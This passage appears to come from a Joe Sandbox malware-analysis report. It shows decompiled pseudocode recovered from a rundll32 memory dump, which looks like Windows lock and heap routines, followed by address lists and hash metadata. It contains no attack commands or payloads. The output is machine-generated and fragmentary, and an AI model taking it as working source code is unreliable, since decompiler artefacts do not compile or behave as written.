                                                                                                                									_t197 = E04432EB0(_t240 + 8);
                                                                                                                									__eflags = _t197 - 2;
                                                                                                                									if(_t197 == 2) {
                                                                                                                										goto L25;
                                                                                                                									}
                                                                                                                								}
                                                                                                                								L40:
                                                                                                                								_t133 = 1;
                                                                                                                								L26:
                                                                                                                								_t228 = _v75;
                                                                                                                								_v56 = _t240;
                                                                                                                								__eflags = _t133;
                                                                                                                								if(_t133 != 0) {
                                                                                                                									__eflags = _t228;
                                                                                                                									if(_t228 == 0) {
                                                                                                                										L43:
                                                                                                                										__eflags = _v72;
                                                                                                                										if(_v72 == 0) {
                                                                                                                											goto L8;
                                                                                                                										}
                                                                                                                										goto L69;
                                                                                                                									}
                                                                                                                									_t133 = E044058EC(_t240);
                                                                                                                									_t221 =  *0x44f5cac; // 0x16
                                                                                                                									__eflags = _t221 & 0x00000040;
                                                                                                                									if((_t221 & 0x00000040) != 0) {
                                                                                                                										_t228 = 0;
                                                                                                                										__eflags = _t252;
                                                                                                                										if(_t252 != 0) {
                                                                                                                											goto L43;
                                                                                                                										}
                                                                                                                										_t133 = _v72;
                                                                                                                										goto L7;
                                                                                                                									}
                                                                                                                									goto L43;
                                                                                                                								} else {
                                                                                                                									_t133 = _v72;
                                                                                                                									goto L6;
                                                                                                                								}
                                                                                                                							}
                                                                                                                							L25:
                                                                                                                							_t133 = _v73;
                                                                                                                							goto L26;
                                                                                                                						} else {
                                                                                                                							L6:
                                                                                                                							_t221 =  *0x44f5cac; // 0x16
                                                                                                                							L7:
                                                                                                                							if(_t133 != 0) {
                                                                                                                								__eflags = _t133 & 0x00001000;
                                                                                                                								if((_t133 & 0x00001000) != 0) {
                                                                                                                									_t133 = _t133 | 0x00000a00;
                                                                                                                									__eflags = _t221 & 0x00000004;
                                                                                                                									if((_t221 & 0x00000004) != 0) {
                                                                                                                										_t133 = _t133 | 0x00000400;
                                                                                                                									}
                                                                                                                								}
                                                                                                                								__eflags = _t228;
                                                                                                                								if(_t228 != 0) {
                                                                                                                									_t133 = _t133 | 0x00000100;
                                                                                                                								}
                                                                                                                								_t229 = E04444A2C(0x44f6e40, 0x4444b30, _t133, _t240);
                                                                                                                								__eflags = _t229;
                                                                                                                								if(_t229 == 0) {
                                                                                                                									_t202 = _a20;
                                                                                                                									goto L100;
                                                                                                                								} else {
                                                                                                                									_t135 =  *((intOrPtr*)(_t229 + 0x38));
                                                                                                                									L15:
                                                                                                                									_t202 = _a20;
                                                                                                                									 *_t202 = _t135;
                                                                                                                									if(_t229 == 0) {
                                                                                                                										L100:
                                                                                                                										 *_a4 = 0;
                                                                                                                										_t137 = _a8;
                                                                                                                										__eflags = _t137;
                                                                                                                										if(_t137 != 0) {
                                                                                                                											 *_t137 = 0;
                                                                                                                										}
                                                                                                                										 *_t202 = 0;
                                                                                                                										_t129 = 0xc0000017;
                                                                                                                										goto L23;
                                                                                                                									} else {
                                                                                                                										_t242 = _a16;
                                                                                                                										if(_t242 != 0) {
                                                                                                                											_t254 = _t229;
                                                                                                                											memcpy(_t242, _t254, 0xd << 2);
                                                                                                                											_t267 = _t267 + 0xc;
                                                                                                                											_t242 = _t254 + 0x1a;
                                                                                                                										}
                                                                                                                										_t205 = _a4;
                                                                                                                										_t25 = _t229 + 0x48; // 0x48
                                                                                                                										 *_t205 = _t25;
                                                                                                                										_t140 = _a8;
                                                                                                                										if(_t140 != 0) {
                                                                                                                											__eflags =  *((char*)(_t267 + 0xa));
                                                                                                                											if( *((char*)(_t267 + 0xa)) != 0) {
                                                                                                                												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
                                                                                                                											} else {
                                                                                                                												 *_t140 = 0;
                                                                                                                											}
                                                                                                                										}
                                                                                                                										_t256 = _a12;
                                                                                                                										if(_t256 != 0) {
                                                                                                                											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
                                                                                                                										}
                                                                                                                										_t257 =  *_t205;
                                                                                                                										_v48 = 0;
                                                                                                                										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
                                                                                                                										_v56 = 0;
                                                                                                                										_v52 = 0;
                                                                                                                										_t144 =  *( *[fs:0x30] + 0x50);
                                                                                                                										if(_t144 != 0) {
                                                                                                                											__eflags =  *_t144;
                                                                                                                											if( *_t144 == 0) {
                                                                                                                												goto L20;
                                                                                                                											}
                                                                                                                											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                                                                                                                											goto L21;
                                                                                                                										} else {
                                                                                                                											L20:
                                                                                                                											_t145 = 0x7ffe0384;
                                                                                                                											L21:
                                                                                                                											if( *_t145 != 0) {
                                                                                                                												_t146 =  *[fs:0x30];
                                                                                                                												__eflags =  *(_t146 + 0x240) & 0x00000004;
                                                                                                                												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
                                                                                                                													_t147 = E04427D50();
                                                                                                                													__eflags = _t147;
                                                                                                                													if(_t147 == 0) {
                                                                                                                														_t148 = 0x7ffe0385;
                                                                                                                													} else {
                                                                                                                														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                                                                                                                													}
                                                                                                                													__eflags =  *_t148 & 0x00000020;
                                                                                                                													if(( *_t148 & 0x00000020) != 0) {
                                                                                                                														_t149 = _v72;
                                                                                                                														__eflags = _t149;
                                                                                                                														if(__eflags == 0) {
                                                                                                                															_t149 = 0x43e5c80;
                                                                                                                														}
                                                                                                                														_push(_t149);
                                                                                                                														_push( &_v48);
                                                                                                                														 *((char*)(_t267 + 0xb)) = E0443F6E0(_t198, _t242, _t257, __eflags);
                                                                                                                														_push(_t257);
                                                                                                                														_push( &_v64);
                                                                                                                														_t153 = E0443F6E0(_t198, _t242, _t257, __eflags);
                                                                                                                														__eflags =  *((char*)(_t267 + 0xb));
                                                                                                                														if( *((char*)(_t267 + 0xb)) != 0) {
                                                                                                                															__eflags = _t153;
                                                                                                                															if(_t153 != 0) {
                                                                                                                																__eflags = 0;
                                                                                                                																E04487016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
                                                                                                                																L04422400(_t267 + 0x20);
                                                                                                                															}
                                                                                                                															L04422400( &_v64);
                                                                                                                														}
                                                                                                                													}
                                                                                                                												}
                                                                                                                											}
                                                                                                                											_t129 = 0;
                                                                                                                											L23:
                                                                                                                											return _t129;
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                							L8:
                                                                                                                							_t275 = _t240;
                                                                                                                							if(_t275 != 0) {
                                                                                                                								_v73 = 0;
                                                                                                                								_t253 = 0;
                                                                                                                								__eflags = 0;
                                                                                                                								L29:
                                                                                                                								_push(0);
                                                                                                                								_t241 = E04432397(_t240);
                                                                                                                								__eflags = _t241;
                                                                                                                								if(_t241 == 0) {
                                                                                                                									_t229 = 0;
                                                                                                                									L14:
                                                                                                                									_t135 = 0;
                                                                                                                									goto L15;
                                                                                                                								}
                                                                                                                								__eflags =  *((char*)(_t267 + 0xb));
                                                                                                                								 *(_t241 + 0x34) = 1;
                                                                                                                								if( *((char*)(_t267 + 0xb)) != 0) {
                                                                                                                									E04422280(_t134, 0x44f8608);
                                                                                                                									__eflags =  *0x44f6e48 - _t253; // 0x36d670
                                                                                                                									if(__eflags != 0) {
                                                                                                                										L48:
                                                                                                                										_t253 = 0;
                                                                                                                										__eflags = 0;
                                                                                                                										L49:
                                                                                                                										E0441FFB0(_t198, _t241, 0x44f8608);
                                                                                                                										__eflags = _t253;
                                                                                                                										if(_t253 != 0) {
                                                                                                                											L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
                                                                                                                										}
                                                                                                                										goto L31;
                                                                                                                									}
                                                                                                                									 *0x44f6e48 = _t241;
                                                                                                                									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
                                                                                                                									__eflags = _t253;
                                                                                                                									if(_t253 != 0) {
                                                                                                                										_t57 = _t253 + 0x34;
                                                                                                                										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
                                                                                                                										__eflags =  *_t57;
                                                                                                                										if( *_t57 == 0) {
                                                                                                                											goto L49;
                                                                                                                										}
                                                                                                                									}
                                                                                                                									goto L48;
                                                                                                                								}
                                                                                                                								L31:
                                                                                                                								_t229 = _t241;
                                                                                                                								goto L14;
                                                                                                                							}
                                                                                                                							_v73 = 1;
                                                                                                                							_v64 = _t240;
                                                                                                                							asm("lock bts dword [esi], 0x0");
                                                                                                                							if(_t275 < 0) {
                                                                                                                								_t231 =  *0x44f8608; // 0x0
                                                                                                                								while(1) {
                                                                                                                									_v60 = _t231;
                                                                                                                									__eflags = _t231 & 0x00000001;
                                                                                                                									if((_t231 & 0x00000001) != 0) {
                                                                                                                										goto L76;
                                                                                                                									}
                                                                                                                									_t73 = _t231 + 1; // 0x1
                                                                                                                									_t210 = _t73;
                                                                                                                									asm("lock cmpxchg [edi], ecx");
                                                                                                                									__eflags = _t231 - _t231;
                                                                                                                									if(_t231 != _t231) {
                                                                                                                										L92:
                                                                                                                										_t133 = E04436B90(_t210,  &_v64);
                                                                                                                										_t262 =  *0x44f8608; // 0x0
                                                                                                                										L93:
                                                                                                                										_t231 = _t262;
                                                                                                                										continue;
                                                                                                                									}
                                                                                                                									_t240 = _v56;
                                                                                                                									goto L10;
                                                                                                                									L76:
                                                                                                                									_t169 = E0443E180(_t133);
                                                                                                                									__eflags = _t169;
                                                                                                                									if(_t169 != 0) {
                                                                                                                										_push(0xc000004b);
                                                                                                                										_push(0xffffffff);
                                                                                                                										E044497C0();
                                                                                                                										_t231 = _v68;
                                                                                                                									}
                                                                                                                									_v72 = 0;
                                                                                                                									_v24 =  *( *[fs:0x18] + 0x24);
                                                                                                                									_v16 = 3;
                                                                                                                									_v28 = 0;
                                                                                                                									__eflags = _t231 & 0x00000002;
                                                                                                                									if((_t231 & 0x00000002) == 0) {
                                                                                                                										_v32 =  &_v36;
                                                                                                                										_t174 = _t231 >> 4;
                                                                                                                										__eflags = 1 - _t174;
                                                                                                                										_v20 = _t174;
                                                                                                                										asm("sbb ecx, ecx");
                                                                                                                										_t210 = 3 |  &_v36;
                                                                                                                										__eflags = _t174;
                                                                                                                										if(_t174 == 0) {
                                                                                                                											_v20 = 0xfffffffe;
                                                                                                                										}
                                                                                                                									} else {
                                                                                                                										_v32 = 0;
                                                                                                                										_v20 = 0xffffffff;
                                                                                                                										_v36 = _t231 & 0xfffffff0;
                                                                                                                										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
                                                                                                                										_v72 =  !(_t231 >> 2) & 0xffffff01;
                                                                                                                									}
                                                                                                                									asm("lock cmpxchg [edi], esi");
                                                                                                                									_t262 = _t231;
                                                                                                                									__eflags = _t262 - _t231;
                                                                                                                									if(_t262 != _t231) {
                                                                                                                										goto L92;
                                                                                                                									} else {
                                                                                                                										__eflags = _v72;
                                                                                                                										if(_v72 != 0) {
                                                                                                                											E0444006A(0x44f8608, _t210);
                                                                                                                										}
                                                                                                                										__eflags =  *0x7ffe036a - 1;
                                                                                                                										if(__eflags <= 0) {
                                                                                                                											L89:
                                                                                                                											_t133 =  &_v16;
                                                                                                                											asm("lock btr dword [eax], 0x1");
                                                                                                                											if(__eflags >= 0) {
                                                                                                                												goto L93;
                                                                                                                											} else {
                                                                                                                												goto L90;
                                                                                                                											}
                                                                                                                											do {
                                                                                                                												L90:
                                                                                                                												_push(0);
                                                                                                                												_push(0x44f8608);
                                                                                                                												E0444B180();
                                                                                                                												_t133 = _v24;
                                                                                                                												__eflags = _t133 & 0x00000004;
                                                                                                                											} while ((_t133 & 0x00000004) == 0);
                                                                                                                											goto L93;
                                                                                                                										} else {
                                                                                                                											_t218 =  *0x44f6904; // 0x400
                                                                                                                											__eflags = _t218;
                                                                                                                											if(__eflags == 0) {
                                                                                                                												goto L89;
                                                                                                                											} else {
                                                                                                                												goto L87;
                                                                                                                											}
                                                                                                                											while(1) {
                                                                                                                												L87:
                                                                                                                												__eflags = _v16 & 0x00000002;
                                                                                                                												if(__eflags == 0) {
                                                                                                                													goto L89;
                                                                                                                												}
                                                                                                                												asm("pause");
                                                                                                                												_t218 = _t218 - 1;
                                                                                                                												__eflags = _t218;
                                                                                                                												if(__eflags != 0) {
                                                                                                                													continue;
                                                                                                                												}
                                                                                                                												goto L89;
                                                                                                                											}
                                                                                                                											goto L89;
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                							L10:
                                                                                                                							_t229 =  *0x44f6e48; // 0x36d670
                                                                                                                							_v72 = _t229;
                                                                                                                							if(_t229 == 0) {
                                                                                                                								L45:
                                                                                                                								E0441FFB0(_t198, _t240, 0x44f8608);
                                                                                                                								_t253 = _v76;
                                                                                                                								goto L29;
                                                                                                                							}
                                                                                                                							if( *((char*)(_t229 + 0x40)) != 0) {
                                                                                                                								L13:
                                                                                                                								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
                                                                                                                								asm("lock cmpxchg [esi], ecx");
                                                                                                                								_t215 = 1;
                                                                                                                								if(1 != 1) {
                                                                                                                									while(1) {
                                                                                                                										_t246 = _t215 & 0x00000006;
                                                                                                                										_t180 = _t215;
                                                                                                                										__eflags = _t246 - 2;
                                                                                                                										_v56 = _t246;
                                                                                                                										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
                                                                                                                										asm("lock cmpxchg [edi], esi");
                                                                                                                										_t248 = _v56;
                                                                                                                										__eflags = _t180 - _t215;
                                                                                                                										if(_t180 == _t215) {
                                                                                                                											break;
                                                                                                                										}
                                                                                                                										_t215 = _t180;
                                                                                                                									}
                                                                                                                									__eflags = _t248 - 2;
                                                                                                                									if(_t248 == 2) {
                                                                                                                										__eflags = 0;
                                                                                                                										E044400C2(0x44f8608, 0, _t235);
                                                                                                                									}
                                                                                                                									_t229 = _v72;
                                                                                                                								}
                                                                                                                								goto L14;
                                                                                                                							}
                                                                                                                							_t18 = _t229 + 0x38; // 0x0
                                                                                                                							if( *_t18 !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                                                                                                                								goto L45;
                                                                                                                							}
                                                                                                                							goto L13;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t227 = 0;
                                                                                                                				_v75 = 0;
                                                                                                                				if(_t128 != 0) {
                                                                                                                					goto L4;
                                                                                                                				}
                                                                                                                				goto L2;
                                                                                                                			}











































































                                                                                                                0x00000000
                                                                                                                0x0443225c
                                                                                                                0x0443212a
                                                                                                                0x04432134
                                                                                                                0x04432138
                                                                                                                0x0443213d
                                                                                                                0x04475858
                                                                                                                0x04475863
                                                                                                                0x04475863
                                                                                                                0x04475867
                                                                                                                0x0447586a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0447586c
                                                                                                                0x0447586c
                                                                                                                0x04475871
                                                                                                                0x04475875
                                                                                                                0x04475877
                                                                                                                0x04475997
                                                                                                                0x0447599c
                                                                                                                0x044759a1
                                                                                                                0x044759a7
                                                                                                                0x044759a7
                                                                                                                0x00000000
                                                                                                                0x044759a7
                                                                                                                0x0447587d
                                                                                                                0x00000000
                                                                                                                0x0447588b
                                                                                                                0x0447588b
                                                                                                                0x04475890
                                                                                                                0x04475892
                                                                                                                0x04475894
                                                                                                                0x04475899
                                                                                                                0x0447589b
                                                                                                                0x044758a0
                                                                                                                0x044758a0
                                                                                                                0x044758aa
                                                                                                                0x044758b2
                                                                                                                0x044758b6
                                                                                                                0x044758be
                                                                                                                0x044758c6
                                                                                                                0x044758c9
                                                                                                                0x0447590d
                                                                                                                0x04475917
                                                                                                                0x0447591a
                                                                                                                0x0447591c
                                                                                                                0x04475920
                                                                                                                0x04475928
                                                                                                                0x0447592a
                                                                                                                0x0447592c
                                                                                                                0x0447592e
                                                                                                                0x0447592e
                                                                                                                0x044758cb
                                                                                                                0x044758cd
                                                                                                                0x044758d8
                                                                                                                0x044758e0
                                                                                                                0x044758f4
                                                                                                                0x044758fe
                                                                                                                0x044758fe
                                                                                                                0x0447593a
                                                                                                                0x0447593e
                                                                                                                0x04475940
                                                                                                                0x04475942
                                                                                                                0x00000000
                                                                                                                0x04475944
                                                                                                                0x04475944
                                                                                                                0x04475949
                                                                                                                0x0447594e
                                                                                                                0x0447594e
                                                                                                                0x04475953
                                                                                                                0x0447595b
                                                                                                                0x04475976
                                                                                                                0x04475976
                                                                                                                0x0447597a
                                                                                                                0x0447597f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04475981
                                                                                                                0x04475981
                                                                                                                0x04475981
                                                                                                                0x04475983
                                                                                                                0x04475988
                                                                                                                0x0447598d
                                                                                                                0x04475991
                                                                                                                0x04475991
                                                                                                                0x00000000
                                                                                                                0x0447595d
                                                                                                                0x0447595d
                                                                                                                0x04475963
                                                                                                                0x04475965
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04475967
                                                                                                                0x04475967
                                                                                                                0x0447596b
                                                                                                                0x0447596d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0447596f
                                                                                                                0x04475971
                                                                                                                0x04475971
                                                                                                                0x04475974
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04475974
                                                                                                                0x00000000
                                                                                                                0x04475967
                                                                                                                0x0447595b
                                                                                                                0x04475942
                                                                                                                0x04475863
                                                                                                                0x04432143
                                                                                                                0x04432143
                                                                                                                0x04432149
                                                                                                                0x0443214f
                                                                                                                0x044322ec
                                                                                                                0x044322f1
                                                                                                                0x044322f6
                                                                                                                0x00000000
                                                                                                                0x044322f6
                                                                                                                0x04432159
                                                                                                                0x04432173
                                                                                                                0x04432173
                                                                                                                0x0443217d
                                                                                                                0x04432181
                                                                                                                0x04432186
                                                                                                                0x044759ae
                                                                                                                0x044759b2
                                                                                                                0x044759b5
                                                                                                                0x044759b7
                                                                                                                0x044759ba
                                                                                                                0x044759cd
                                                                                                                0x044759d1
                                                                                                                0x044759d5
                                                                                                                0x044759d9
                                                                                                                0x044759db
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044759dd
                                                                                                                0x044759dd
                                                                                                                0x044759e1
                                                                                                                0x044759e4
                                                                                                                0x044759e7
                                                                                                                0x044759ee
                                                                                                                0x044759ee
                                                                                                                0x044759f3
                                                                                                                0x044759f3
                                                                                                                0x00000000
                                                                                                                0x04432186
                                                                                                                0x04432164
                                                                                                                0x0443216d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0443216d
                                                                                                                0x04432106
                                                                                                                0x04432266
                                                                                                                0x044320d8
                                                                                                                0x044320da
                                                                                                                0x044320e0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 581000ee33590b98da537784bde523cdd4dcbad7c2c325a95986f80d248c100b
                                                                                                                • Instruction ID: 6c64eb3b6ad94198dad35ca4656158f3fe07dd5067569f689b9c7c908a781031
                                                                                                                • Opcode Fuzzy Hash: 581000ee33590b98da537784bde523cdd4dcbad7c2c325a95986f80d248c100b
                                                                                                                • Instruction Fuzzy Hash: 0AF1C371608341AFEF25CE28C94076BB7E1BB89B15F04895FE9959B381D774F842CB82
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 93%
                                                                                                                			E0441849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
                                                                                                                				void* _t136;
                                                                                                                				signed int _t139;
                                                                                                                				signed int _t141;
                                                                                                                				signed int _t145;
                                                                                                                				intOrPtr _t146;
                                                                                                                				signed int _t149;
                                                                                                                				signed int _t150;
                                                                                                                				signed int _t161;
                                                                                                                				signed int _t163;
                                                                                                                				signed int _t165;
                                                                                                                				signed int _t169;
                                                                                                                				signed int _t171;
                                                                                                                				signed int _t194;
                                                                                                                				signed int _t200;
                                                                                                                				void* _t201;
                                                                                                                				signed int _t204;
                                                                                                                				signed int _t206;
                                                                                                                				signed int _t210;
                                                                                                                				signed int _t214;
                                                                                                                				signed int _t215;
                                                                                                                				signed int _t218;
                                                                                                                				void* _t221;
                                                                                                                				signed int _t224;
                                                                                                                				signed int _t226;
                                                                                                                				intOrPtr _t228;
                                                                                                                				signed int _t232;
                                                                                                                				signed int _t233;
                                                                                                                				signed int _t234;
                                                                                                                				void* _t237;
                                                                                                                				void* _t238;
                                                                                                                
                                                                                                                				_t236 = __esi;
                                                                                                                				_t235 = __edi;
                                                                                                                				_t193 = __ebx;
                                                                                                                				_push(0x70);
                                                                                                                				_push(0x44df9c0);
                                                                                                                				E0445D0E8(__ebx, __edi, __esi);
                                                                                                                				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
                                                                                                                				if( *0x44f7b04 == 0) {
                                                                                                                					L4:
                                                                                                                					goto L5;
                                                                                                                				} else {
                                                                                                                					_t136 = E0441CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
                                                                                                                					_t236 = 0;
                                                                                                                					if(_t136 < 0) {
                                                                                                                						 *((intOrPtr*)(_t237 - 0x54)) = 0;
                                                                                                                					}
                                                                                                                					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
                                                                                                                						_t193 =  *( *[fs:0x30] + 0x18);
                                                                                                                						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
                                                                                                                						 *(_t237 - 0x68) = _t236;
                                                                                                                						 *(_t237 - 0x6c) = _t236;
                                                                                                                						_t235 = _t236;
                                                                                                                						 *(_t237 - 0x60) = _t236;
                                                                                                                						E04422280( *[fs:0x30], 0x44f8550);
                                                                                                                						_t139 =  *0x44f7b04; // 0x1
                                                                                                                						__eflags = _t139 - 1;
                                                                                                                						if(__eflags != 0) {
                                                                                                                							_t200 = 0xc;
                                                                                                                							_t201 = _t237 - 0x40;
                                                                                                                							_t141 = E0443F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
                                                                                                                							 *(_t237 - 0x44) = _t141;
                                                                                                                							__eflags = _t141;
                                                                                                                							if(_t141 < 0) {
                                                                                                                								L50:
                                                                                                                								E0441FFB0(_t193, _t235, 0x44f8550);
                                                                                                                								L5:
                                                                                                                								return E0445D130(_t193, _t235, _t236);
                                                                                                                							}
                                                                                                                							_push(_t201);
                                                                                                                							_t221 = 0x10;
                                                                                                                							_t202 =  *(_t237 - 0x40);
                                                                                                                							_t145 = E04401C45( *(_t237 - 0x40), _t221);
                                                                                                                							 *(_t237 - 0x44) = _t145;
                                                                                                                							__eflags = _t145;
                                                                                                                							if(_t145 < 0) {
                                                                                                                								goto L50;
                                                                                                                							}
                                                                                                                							_t146 =  *0x44f7b9c; // 0x0
                                                                                                                							_t235 = L04424620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
                                                                                                                							 *(_t237 - 0x60) = _t235;
                                                                                                                							__eflags = _t235;
                                                                                                                							if(_t235 == 0) {
                                                                                                                								_t149 = 0xc0000017;
                                                                                                                								 *(_t237 - 0x44) = 0xc0000017;
                                                                                                                							} else {
                                                                                                                								_t149 =  *(_t237 - 0x44);
                                                                                                                							}
                                                                                                                							__eflags = _t149;
                                                                                                                							if(__eflags >= 0) {
                                                                                                                								L8:
                                                                                                                								 *(_t237 - 0x64) = _t235;
                                                                                                                								_t150 =  *0x44f7b10; // 0x9
                                                                                                                								 *(_t237 - 0x4c) = _t150;
                                                                                                                								_t193 = E0443A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags, _t237 - 0x58, _t237 - 0x39, _t237 - 0x74);
                                                                                                                								 *(_t237 - 0x44) = _t193;
                                                                                                                								__eflags = _t193;
                                                                                                                								if(_t193 < 0) {
                                                                                                                									L30:
                                                                                                                									E0441FFB0(_t193, _t235, 0x44f8550);
                                                                                                                									__eflags = _t235 - _t237 - 0x38;
                                                                                                                									if(_t235 != _t237 - 0x38) {
                                                                                                                										_t235 =  *(_t237 - 0x48);
                                                                                                                										L044277F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
                                                                                                                									} else {
                                                                                                                										_t235 =  *(_t237 - 0x48);
                                                                                                                									}
                                                                                                                									__eflags =  *(_t237 - 0x6c);
                                                                                                                									if( *(_t237 - 0x6c) != 0) {
                                                                                                                										L044277F0(_t235, _t236,  *(_t237 - 0x6c));
                                                                                                                									}
                                                                                                                									__eflags = _t193;
                                                                                                                									if(_t193 >= 0) {
                                                                                                                										goto L4;
                                                                                                                									} else {
                                                                                                                										goto L5;
                                                                                                                									}
                                                                                                                								}
                                                                                                                								_t204 =  *0x44f7b04; // 0x1
                                                                                                                								 *(_t235 + 8) = _t204;
                                                                                                                								__eflags =  *((char*)(_t237 - 0x39));
                                                                                                                								if( *((char*)(_t237 - 0x39)) != 0) {
                                                                                                                									 *(_t235 + 4) = 1;
                                                                                                                									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
                                                                                                                									_t161 =  *0x44f7b10; // 0x9
                                                                                                                									 *(_t237 - 0x4c) = _t161;
                                                                                                                								} else {
                                                                                                                									 *(_t235 + 4) = _t236;
                                                                                                                									 *(_t235 + 0xc) =  *(_t237 - 0x58);
                                                                                                                								}
                                                                                                                								 *((intOrPtr*)(_t237 - 0x54)) = E044437C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
                                                                                                                								_t224 = _t236;
                                                                                                                								 *(_t237 - 0x40) = _t236;
                                                                                                                								 *(_t237 - 0x50) = _t236;
                                                                                                                								while(1) {
                                                                                                                									_t163 =  *(_t235 + 8);
                                                                                                                									__eflags = _t224 - _t163;
                                                                                                                									if(_t224 >= _t163) {
                                                                                                                										break;
                                                                                                                									}
                                                                                                                									_t228 =  *0x44f7b9c; // 0x0
                                                                                                                									_t214 = L04424620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
                                                                                                                									 *(_t237 - 0x78) = _t214;
                                                                                                                									__eflags = _t214;
                                                                                                                									if(_t214 == 0) {
                                                                                                                										L52:
                                                                                                                										_t193 = 0xc0000017;
                                                                                                                										L19:
                                                                                                                										 *(_t237 - 0x44) = _t193;
                                                                                                                										L20:
                                                                                                                										_t206 =  *(_t237 - 0x40);
                                                                                                                										__eflags = _t206;
                                                                                                                										if(_t206 == 0) {
                                                                                                                											L26:
                                                                                                                											__eflags = _t193;
                                                                                                                											if(_t193 < 0) {
                                                                                                                												E044437F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
                                                                                                                												__eflags =  *((char*)(_t237 - 0x39));
                                                                                                                												if( *((char*)(_t237 - 0x39)) != 0) {
                                                                                                                													 *0x44f7b10 =  *0x44f7b10 - 8;
                                                                                                                												}
                                                                                                                											} else {
                                                                                                                												_t169 =  *(_t237 - 0x68);
                                                                                                                												__eflags = _t169;
                                                                                                                												if(_t169 != 0) {
                                                                                                                													 *0x44f7b04 =  *0x44f7b04 - _t169;
                                                                                                                												}
                                                                                                                											}
                                                                                                                											__eflags = _t193;
                                                                                                                											if(_t193 >= 0) {
                                                                                                                												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
                                                                                                                											}
                                                                                                                											goto L30;
                                                                                                                										}
                                                                                                                										_t226 = _t206 * 0xc;
                                                                                                                										__eflags = _t226;
                                                                                                                										_t194 =  *(_t237 - 0x48);
                                                                                                                										do {
                                                                                                                											 *(_t237 - 0x40) = _t206 - 1;
                                                                                                                											_t226 = _t226 - 0xc;
                                                                                                                											 *(_t237 - 0x4c) = _t226;
                                                                                                                											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
                                                                                                                											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
                                                                                                                												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
                                                                                                                												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
                                                                                                                													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
                                                                                                                													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                                                                                                                													__eflags =  *((char*)(_t237 - 0x39));
                                                                                                                													if( *((char*)(_t237 - 0x39)) == 0) {
                                                                                                                														_t171 = _t210;
                                                                                                                													} else {
                                                                                                                														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
                                                                                                                														L044277F0(_t194, _t236, _t210 - 8);
                                                                                                                														_t171 =  *(_t237 - 0x50);
                                                                                                                													}
                                                                                                                													L48:
                                                                                                                													L044277F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
                                                                                                                													L46:
                                                                                                                													_t206 =  *(_t237 - 0x40);
                                                                                                                													_t226 =  *(_t237 - 0x4c);
                                                                                                                													goto L24;
                                                                                                                												}
                                                                                                                												 *0x44f7b08 =  *0x44f7b08 + 1;
                                                                                                                												goto L24;
                                                                                                                											}
